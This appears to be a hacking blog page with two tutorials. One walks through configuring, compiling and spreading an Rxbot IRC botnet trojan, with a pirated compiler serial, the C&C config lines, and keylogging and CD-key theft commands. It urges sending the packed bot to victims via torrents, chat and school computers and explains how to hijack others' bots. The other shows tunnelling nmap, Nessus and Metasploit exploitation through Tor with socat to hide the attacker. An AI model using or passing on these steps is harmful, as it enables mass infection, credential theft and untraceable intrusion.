How To Create And Compile Botnets To Autohack 1000ds of Systems

 i found a nice tut that helps u with the basics of the botnets

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:



Download

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.



Q:What is a botnet?

A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competeter bots.

Or even kill AV/FW apon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !



Theres the infected computers "bots" the attacker, the server, and the victim.

Quote:

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.



Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.



Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.

---------------

Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:

Download tutorial



-----------------------------

Here we go ladies and gentlemen

Follow the tutorial:

-----------------------------



I. Setting up the C++ compilier: (easy)



1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)

Mirror 2

Mirror 3 Direct

Pass: itzforblitz

Serial: 812-2224558



2. Run setup.exe and install. Remember to input serial



3. Download and install the Service Pack 6 (60.8 mb)



4. After that Download and install:



Windows SDK (1.2 mb)

Mirror 2

Mirror 3

Pass: itzforblitz

-------------------------------------



II. Configuring the C++ compilier (easy)



1. Open up Microsoft Visual C++ Compilier 6.0

2. Go to Tools > Options and Click the "Directories" tab

3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Quote:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE

C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)





(it does not matter whats below those lines)

---------------------------------------



III. Configuring your bot: (easy)



1. Download and unpack:

Rxbot 7.6 (212.3 kb)

Mirror 2

Mirror 3



2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Quote:

Put in quotations:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)

char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)

char serverpass[] = ""; // server password (not usually needed)

char channel[] = "#botz_channel"; // channel that the bot should join

char chanpass[] = "My_channel_pass"; // channel password



Optional:

char server2[] = ""; // backup server

char channel2[] = ""; // backup channel

char chanpass2[] = ""; //Backup channel pass

-----------------------------------

IV. Building your bot: (very easy)



1. Make sure Microsoft Visual C++ is open

2. Select "File > Open Workspace"

3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file

4. Right Click "rBot Files" and click Build:





5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!



YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

-------------------------------------

Command list

Download Command list



Basics:

.login botpassword will login bots

.logout will logout bots

.keylog on will turn keylogger on

.getcdkeys will retrieve cdkeys.

Read command list for more

-----------------------------------

Download mIRC



mIRC

Mirror 2

Mirror 3

--------------------------------------------------------------------------------------------

How to secure your bots:



Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.

To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)

and update the channel topic and run:

Quote:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel

To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.



To secure your self:



It is fairly easy to secure your bots, here is how:



1. When you are in your right click on your chat window and select "Channel Modes"

2. Make sure these options are checked:







This way no one besides you or another op can set the channel topic

Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

------------------------------------------------------------------------

Good IRC Servers:



I would recommend running your botnet on a private server.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

Read More

How To perform Anonymous Port scanning using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Web. It also permits developers / researchers to generate new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that permit organizations and individuals to share information over public networks without compromising their privacy

The Onion Router [TOR] is an excellent work towards defending online privacy. As of with every debate about exploitation frameworks, security tools, vulnerability disclosures such projects have also been victim of criticism, and debates of potential abuse that they may cause and the dangers of teaching individuals a dangerous and potentially illegal craft and a ‘secure’ channel to hide their online presence. But lets face it, the bad guys already know about it (that is the reason they’re bad ‘eh). However although these channels of misuse and abuse do exist and they cannot be ignored, still the merits of it will always outweigh the harm black community may cause.

Regrettably in the country I live in even most of the senior know-how people I meet / see / have a chance to work with, don’t even have a clue of online privacy or security of their information.

Privacy is every individuals right, and is as important as any other basic human need. You will seldom require somebody tracking your IP, spywares tracing your network activity, and the next time you try to experiment with something, you receive a disagreeable small e mail from an ISP admin that you were doing so-and-so. I am by no way TEMPTING you to do something wrong. Its all about your morale and motivation : ) , the small how-to below is a kick starter for getting started with TOR and experimenting with some stuff securely. Interested ? move on, but don’t go about emailing me that this stuff like this is illegal to be posted and ought to be removed.

The problem

A basic issue for the privacy minded is that the recipient of your communication / conversation or even otherwise can see that you sent it by taking a look at the IP headers, or worse trace the whole path. And so can authorized intermediaries like ISPs, govt. organizations etc, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle), taking a look at headers.

But there's also more powerful kinds of packet analysis. Some attackers spy on multiple parts of the Web and use sophisticated statistical techniques to track the communications patterns of plenty of different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Web traffic, not the headers (VPN ? duh!!) .

The solution:

A distributed, anonymous, secure network

To reduce the risks of both simple and sophisticated traffic analysis by distributing your web traffic over several places / servers, so no single point can link you to your location helps defending your privacy. Its like taking a zig-zag random, hard to follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films : ) ) , then periodically erasing your footprints. In lieu of taking a direct route from source to location, information packets on TOR take a random pathway through several servers that cover your tracks so no observer at any single point can tell where the information came from or where it is going.

TOR incrementally builds a circuit of encrypted connections through servers on the network which is extended one hop at a time, and each server along the way knows only which server gave it information and which server it is giving information to. No individual server ever knows the whole path that a knowledge packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make positive that each hop cannot trace these connections as they pass through.

Two times a circuit has been established any information can be exchanged and because each server sees no over one hop in the circuit, neither an eavesdropper nor a compromised server can use traffic analysis to link the connection's source and location.

Tor only works for TCP streams and can be used by any application with SOCKS support.

to experiment and write this small how-to, I setup a server on the Web that I desired to scan from my home network using Nmap, Nessus, and metasploit from my bacttrack suite installed in a VM. Here are the steps I followed to launch the scan / exploitation method by Tor:

A. Installing TOR: Detailed instructions can be viewed on the net site.

B) Download socat .This gizmo is an excellent multipurpose relay and will permit to setup a local TCP listener that will tunnel my connections by the Tor SOCKS server (listening on 9050).

Unfortunately socat comes only on bsd and *nix systems. To make use of TOR on windows I would recommend using Privoxy, or better installing the whole TorCP bundle.



Let us assume that the IP address of the host I desired to scan was 202.163.97.20

I invoked socat:

[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1: 202.163.97.20:80, socksport=9050

The above command causes socat to listen on port 8080, and tunnel all incoming connections to 202.163.97.20 (port 80) by the Tor SOCKS server.

For using on windows you will need to:

1. Install privoxy

2. permit HTTP CONNECT requests by 80 through your firewall

3. Browse to http://config.privoxy.org/show-status

C. I assume Nmap, Nessus and metasploit are already installed and running. If not you can find the detailed instrucations on respective website.

D. Launch an nmap connect or nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the “Scan Options” tab.

Here are a quantity of the entries in my Apache log that were a result of the scan:

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /scripts/fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /scripts/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:58 -0700] "GET /Album/ HTTP/1.1" 404 204 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /fom/fom.cgi?cmd=&file=1&keywords=nessus HTTP/1.1" 404 209 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

212.9.32.5 - - [10/Jul/2005:17:29:59 -0700] "GET /cgi-bin/wiki.pl? HTTP/1.1" 404 213 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"

The 212.9.32.5 IP address represents the host that is the last onion router in the random circuit that was setup by the Tor program

Simlarly two times you discover a vuln in a remote technique, setup another instance of socat: Say for simplicity you are exploiting a webserver (port 80).

[talha@localhost#] ./socat TCP4-LISTEN:1234,fork SOCKS4:127.0.0.1: 202.163.97.20:80,

In metasploit when launching the exploit, set the target IP to 127.0.0.1 and remote port to 1234. Its that simple eh.

The above instructions may even be used to exploit program flaws in order to anonymously execute arbitrary commands on vulnerable hosts.



Some pieces of advice:

1. Nmap makes use of something that generates packets by the raw packet interface so the packets connect directly to the target, not by Tor. For example:

Doing a connect() scan (TCP) will work with Tor but using something like -sS connects directly to the target, revealing your true address.

2. Nmap & Nessus will often ping a target so see if it is up before doing a port scan. This is usually completed by raw ICMP packet's, ICMP won't traverse the Tor network (since its not TCP) and will reveal your true address.

In the usage of socat, socks4 does client side DNS. So you resolve a target host name by DNS from your machine not by the Tor network proxies.

Hence it is impossible to leak your source IP because you tell your scanner to make use of 127.0.0.1 as the target IP . Therefore, nmap / nessus has no host name to resolve, and in case you do forget to tell your scanner not to bother with ICMP pings, you will finish up pinging yourself – not the target directly.

Staying anonymous

Tor cannot solve all anonymity issues. It focuses only on defending the transport of information. You will need to make use of protocol-specific support program in case you don't require the sites you visit to see your identifying information. For example, you can use web proxies such as Privoxy and open relays while web browsing to block cookies and withhold information about your browser type ident.

Be clever. Don't provide your name or other revealing information in web forms. Be aware that, like all anonymizing networks that are fast for web browsing, Tor does not provide protection against end-to-end timing assaults: If your attacker can watch the traffic coming out of your computer, and also the traffic arriving at your selected location, they can use statistical analysis to discover that they are part of the same circuit.

The Electronic Privacy Information Centre (EPIC) lists down a comprehensive list which servers as a sampling of best available privacy enhancing tools.

Read More